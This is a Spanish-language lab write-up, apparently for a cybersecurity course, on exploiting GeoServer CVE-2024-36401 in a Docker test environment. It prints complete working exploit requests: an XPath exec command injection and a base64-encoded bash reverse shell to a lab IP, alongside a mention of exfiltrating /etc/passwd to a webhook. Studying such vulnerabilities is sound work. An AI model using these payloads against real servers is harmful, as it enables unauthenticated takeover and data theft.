---
layout: post
title: "CVE-2024-36401- RCE GeoServer" 
author: yurumeng
feature-img: "/assets/img/posts/geoserver/banner.png"
thumbnail: "/assets/img/posts/geoserver/banner.png"
---

# CVE-2024-36401- RCE GeoServer

![](/assets/img/posts/geoserver/banner.png)

Nota: ¡Hola a todos! Ya algunos me conocerán soy Eduardo Samaniego y este es mi segunda entrada en este blog, quien diría que ha pasado prácticamente un año, bueno, en fin, espero que les guste este artículo, fue creado con mucho cariño y viene tambien de la mano de la materia de Ciberseguridad V impartida por el profesor Jose Moreno. 

GeoServer es un servidor de código abierto basado en Java que facilita la visualización, edición y distribución de datos geoespaciales. Diseñado para proporcionar interoperabilidad en la gestión de información geográfica, GeoServer permite a los usuarios compartir datos provenientes de diversas fuentes, como bases de datos SIG, archivos de datos y servicios web.

Utiliza estándares abiertos del Open Geospatial Consortium (OGC), como WMS (Web Map Service) y WFS (Web Feature Service), para permitir la integración y el intercambio de datos entre diferentes sistemas. Su arquitectura flexible y escalable soporta una amplia gama de formatos de datos y proporciona servicios de mapas y capas que pueden ser visualizados en aplicaciones web y clientes. 

![1](/assets/img/posts/geoserver/1.png)

##### Vulnerabilidad

La vulnerabilidad CVE-2024-36401 afecta a las versiones de GeoServer anteriores a 2.23.6, 2.24.4 y 2.25.2. Esta falla de seguridad permite la ejecución remota de código (RCE) por parte de usuarios no autenticados mediante la explotación de la evaluación insegura de nombres de propiedad como expresiones XPath en varios parámetros de solicitud OGC.

Específicamente, la vulnerabilidad se origina en la forma en que GeoServer utiliza la API de la biblioteca GeoTools para evaluar nombres de propiedades/atributos de tipos de características. La evaluación de estas propiedades se transfiere de manera insegura a la biblioteca commons-jxpath, que tiene la capacidad de ejecutar código arbitrario al procesar expresiones XPath. Aunque esta funcionalidad de XPath está diseñada para tipos de características complejas, se aplica incorrectamente a tipos de características simples, exponiendo así todas las instancias de GeoServer a esta vulnerabilidad.

Un atacante puede explotar esta vulnerabilidad enviando solicitudes maliciosas a través de los métodos OGC como WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic y WPS Execute. La explotación puede resultar en la ejecución 

Podemos revisar el informe de esta vulnerabilidad en los siguientes enlaces 

[NVD - CVE-2024-36401 (nist.gov)](https://nvd.nist.gov/vuln/detail/CVE-2024-36401)

[CVE-2024-36401 | INCIBE-CERT | INCIBE](https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-36401)

**HACEMOS HINCAPIÉ EN QUE EL USO DE ESTA INFORMACIÓN ES EXCLUSIVAMENTE PARA FINES EDUCATIVOS, EN NINGÚN MOMENTO INCITAMOS AL USO INDEBIDO DE ESTA INFORMACIÓN PARA FINES POCO ÉTICOS**

##### Requerimientos Necesarios

- VM Kali Linux (o cualquier distribución de Linux)
- VM Ubuntu Server (o cualquier distribución servidor)

1. Creación de un entorno con Docker y Docker-Compose

   Crearemos un docker-compose.yml

   ![2](/assets/img/posts/geoserver/2.png)

   Dentro setearemos la imagen que queremos utilizar en este caso utilizaremos un geoserver 2.23.2 que es una versión vulnerable

   ```dockerfile
   version: '3'
   services:
    web:
      image: vulhub/geoserver:2.23.2
      ports:
       - "8080:8080"
       - "5005:5005"
   ```

   ![3](/assets/img/posts/geoserver/3.png)

   Ahora sí, finalmente inicializamos y ya tenemos el servidor activo

   ```shell
   docker compose up -d
   ```

   ![4](/assets/img/posts/geoserver/4.png)

   Si vamos a la dirección IP en un navegador podremos ver que tenemos el GeoServer

   ![5](/assets/img/posts/geoserver/5.png)

   Entramos al contenedor creador por el docker-compose.yml

   ![6](/assets/img/posts/geoserver/6.png)

2. Ataque

   ![](/assets/img/posts/geoserver/7.png)

   En burp suite vemos una petición al servidor a la página del geoserver y lo mandamos al repeater (**cabe destacar que en este caso se muestra el secuencer pero al que deben enviarlo es al repeater**)

   Una vez aquí cambiamos la variable del get y ponemos un cambio, borramos todo y agregamos la línea

   ```tex
   GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
   
   Host: your-ip:8080
   
   Accept-Encoding: gzip, deflate, br
   
   Accept: /
   
   Accept-Language: en-US;q=0.9,en;q=0.8
   
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
   
   Connection: close
   
   Cache-Control: max-age=0
   
   
   ```

   Obviamente reemplazamos “your-ip” por la ip del servidor posteriormente hacemos una request y obtendremos una salida parecida a la siguiente

   ![8](/assets/img/posts/geoserver/8.png)

​	Si vemos el tmp del servidor vemos que se ejecutó un código y sale success1

​	![9](/assets/img/posts/geoserver/9.png)

Otro ejemplo serio utilizando post vemos que abajo en el java.lang-runtime.getRunTime() podemos ejecutar

![10](/assets/img/posts/geoserver/10.png)

Vemos que ya tenemos el success2 que sigue siendo un comando

![11](/assets/img/posts/geoserver/11.png)

3. ##### Importancia a nivel más avanzado

Podríamos hacer una modificación en el código y redireccionar con curl por el método post a un webhook para que nos dé una salida que queramos en este caso yo hare un `/etc/passwd`.

![12](/assets/img/posts/geoserver/12.png)

Si nos vamos al webhook veremos que tenemos la salida

![13](/assets/img/posts/geoserver/13.png)

Tomemos en cuenta que tenemos una vulnerabilidad de ejecución de código remoto, esto quiere decir que fácilmente podríamos crearnos una reverse shell o hacer cualquier tipo de manipulación para crearnos una puerta trasera.

Un ejemplo claro de lo que acabamos de exponer es lo siguiente:

En este caso se ha modificado la excepción 

![14](/assets/img/posts/geoserver/14.png)

```text
POST /geoserver/wfs HTTP/1.1

Host: 192.168.50.212:8080

Accept-Encoding: gzip, deflate, br

Accept: */*

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36

Connection: close

Cache-Control: max-age=0

Content-Type: application/xml

Content-Length: 434



<wfs:GetPropertyValue service='WFS' version='2.0.0'

 xmlns:topp='http://www.openplans.org/topp'

 xmlns:fes='http://www.opengis.net/fes/2.0'

 xmlns:wfs='http://www.opengis.net/wfs/2.0'>

  <wfs:Query typeNames='sf:archsites'/>

  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyNC80NDMgMD4mMQ==}|{base64,-d}|{bash,-i}')</wfs:valueReference>

</wfs:GetPropertyValue> 

```

**Finalmente, si nos ponemos en escucha por el puerto 443 en nc que equivale a netcat y ejecutamos la petición podremos obtener una consola.**

![15](/assets/img/posts/geoserver/15.png)

##### Conclusión

Al finalizar este articulo podemos señalar grandes puntos que nos han llevado a la construcción de el laboratorio de pruebas perfecto para poder visualizar la falla dentro de los servidores con GeoServer, logramos destacar la utilización de herramientas como Docker-Compose y Burp Suite que fueron parte del proceso de creación y explotación de la vulnerabilidad, hacemos especial énfasis en que no se recomienda si no se tienen los debidos conocimientos explotar la misma en entornos de producción.

La prueba de concepto utilizada a lo largo de este artículo ha demostrado la gravedad de la vulnerabilidad CVE-2024-36401 en GeoServer, resaltando la facilidad con la que un atacante no autenticado podría explotar dicha falla para ejecutar código arbitrario en servidores configurados con versiones vulnerables. Al recrear un entorno vulnerable y ejecutar la PoC de manera controlada, se evidenció cómo la manipulación de parámetros OGC puede comprometer la integridad y seguridad del sistema.

Dependiendo del entorno y la configuración específica, las consecuencias de esta vulnerabilidad podrían variar desde la simple alteración de datos hasta la obtención de control total sobre el servidor afectado. Esto pone tanto a la disponibilidad del servicio, como también la confidencialidad e integridad de la información geoespacial gestionada por GeoServer en peligro.

Queda en evidencia la importancia de la actualización inmediata a versiones no afectadas, además de la implementación de mejores prácticas de seguridad, como la restricción de acceso y la configuración de mecanismos de autenticación robustos. La identificación de instancias vulnerables mediante el uso de dorks en FOFA nos hace ver lo primordial que es monitorear y proteger activamente las instalaciones de GeoServer en producción